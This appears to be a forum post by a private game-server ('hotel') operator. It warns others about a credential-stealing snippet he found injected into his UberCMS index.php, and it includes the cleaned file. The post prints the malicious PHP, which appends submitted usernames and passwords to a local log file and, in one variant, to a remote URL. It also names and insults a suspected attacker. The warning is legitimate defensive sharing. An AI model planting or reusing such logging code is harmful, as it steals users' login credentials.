- Joined
- Nov 29, 2008
- Messages
- 526
- Reaction score
- 95
Hey guys,
Recently I had an issue with someone gaining access to admins accounts on the hotel and attempting to 'screw **** up' but it didn't work as well as they wished...
Anyway, I couldn't get my head around exactly what was occuring... Until, I stumbled across a file called 'log.txt' and after doing some digging, I found that every time someone logged into the CMS, their user and password were logged in this file.
Example: jay pass user pass user2 pass user3 pass etc.
I couldn't work out how this was happening, then after check index.php I found a suspicious line of code.
As you can see, this is obviously what was causing all our users / passwords to be logged, and I'm glad I finally found it... So I don't want you all going through the same **** that I had to...
Anyway, Check your index.PHP to make sure you don't have anything like this there, and if you ever stumble accross this exploit, now you know... I have no f'ing idea how they gained access to my index.PHP/htdocs though...
Please thank me If this helped you
Regards,
Jay
P.S - Fixed index:
Also: F**k you academ1c from "Yoko hotel", I know you were the one that peformed the exploit, but nice fail... I'm sorry that you have to try and rip other hotels users because you don't have any and can't get any yourself :thumbdown:
EDIT: Seems as If I'm not the first one to have this -
Recently I had an issue with someone gaining access to admins accounts on the hotel and attempting to 'screw **** up' but it didn't work as well as they wished...
Anyway, I couldn't get my head around exactly what was occuring... Until, I stumbled across a file called 'log.txt' and after doing some digging, I found that every time someone logged into the CMS, their user and password were logged in this file.
Example: jay pass user pass user2 pass user3 pass etc.
I couldn't work out how this was happening, then after check index.php I found a suspicious line of code.
PHP:
a = $_POST['credentials_username'];$b = $_POST['credentials_password'];$myFile = "log.txt";$fh = fopen($myFile, 'a') or die("can't open file");$stringData = $a . " " . $b . "\n";fwrite($fh, $stringData);fclose($fh);
$a = $_POST['credentials_username'];$b = $_POST['credentials_password'];$myFile = "http://forum.ragezone.com/images/hackers.jpg";$fh = fopen($myFile, 'a') or die("can't open file");$stringData = $a . " " . $b . "\n";fwrite($fh, $stringData);fclose($fh);
As you can see, this is obviously what was causing all our users / passwords to be logged, and I'm glad I finally found it... So I don't want you all going through the same **** that I had to...
Anyway, Check your index.PHP to make sure you don't have anything like this there, and if you ever stumble accross this exploit, now you know... I have no f'ing idea how they gained access to my index.PHP/htdocs though...
Please thank me If this helped you
Regards,
Jay
P.S - Fixed index:
PHP:
<?php
/*=======================================================================
| UberCMS - Advanced Website and Content Management System for uberEmu
| #######################################################################
| Copyright (c) 2010, Roy 'Meth0d' and updates by Matthew 'MDK'
| http://www.meth0d.org & http://www.sulake.biz
| #######################################################################
| This program is free software: you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation, either version 3 of the License, or
| (at your option) any later version.
| #######################################################################
| This program is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
\======================================================================*/
require_once "global.php";
if (LOGGED_IN)
{
header("Location: " . WWW . "/me");
exit;
}
$tpl->Init();
$tpl->SetParam('page_title', 'Create your avatar, decorate your room, chat and make new friends.');
$tpl->SetParam('credentials_username', '');
$tpl->AddGeneric('head-init');
$tpl->AddIncludeSet('frontpage');
$tpl->WriteIncludeFiles();
$tpl->AddGeneric('head-overrides-fp');
$tpl->AddGeneric('head-bottom');
$frontpage = new Template('page-fp');
$frontpage->SetParam('login_result', '');
if (isset($_POST['credentials_username']) && isset($_POST['credentials_password']))
{
$frontpage->SetParam('credentials_username', $_POST['credentials_username']);
$credUser = filter($_POST['credentials_username']);
$credPass = $core->UberHash($_POST['credentials_password']);
$errors = array();
if (strlen($_POST['credentials_username']) < 1)
{
$errors[] = "Please enter your username";
}
if (strlen($_POST['credentials_password']) < 1)
{
$errors[] = "Please enter your password";
}
if (count($errors) == 0)
{
if ($users->ValidateUser($credUser, $credPass))
{
if (isset($_POST['page']))
{
$reqPage = filter($_POST['page']);
$pos = strrpos($reqPage, WWW);
if ($pos === false || $pos != 0)
{
die("<b>Security warning!</b> A malicious request was detected that tried redirecting you to an external site. Please proceed with caution, this may have been an attempt to steal your login details. <a href='" . WWW . "'>Return to site</a>");
}
else
{
$_SESSION['page-redirect'] = $reqPage;
}
}
$_SESSION['UBER_USER_N'] = $users->GetUserVar($users->Name2id($credUser), 'username');
$_SESSION['UBER_USER_H'] = $credPass;
if (isset($_POST['_login_remember_me']))
{
$_SESSION['set_cookies'] = true;
}
header("Location: " . WWW . "/security_check");
exit;
}
else
{
$errors[] = "Incorrect password";
}
}
if (count($errors) > 0)
{
$loginResult = '<div class="action-error flash-message"><div class="rounded"><ul>';
foreach ($errors as $err)
{
$loginResult .= '<li>' . $err . '</li>';
}
$loginResult .= '</ul></div></div>';
$frontpage->SetParam('login_result', $loginResult);
}
}
$tpl->AddTemplate($frontpage);
$tpl->AddGeneric('footer');
$tpl->Output();
?>
Also: F**k you academ1c from "Yoko hotel", I know you were the one that peformed the exploit, but nice fail... I'm sorry that you have to try and rip other hotels users because you don't have any and can't get any yourself :thumbdown:
EDIT: Seems as If I'm not the first one to have this -
To view the content, you need to sign in or register
(IP's logged only on there though)... Why would someone wish to log IP's
Last edited:

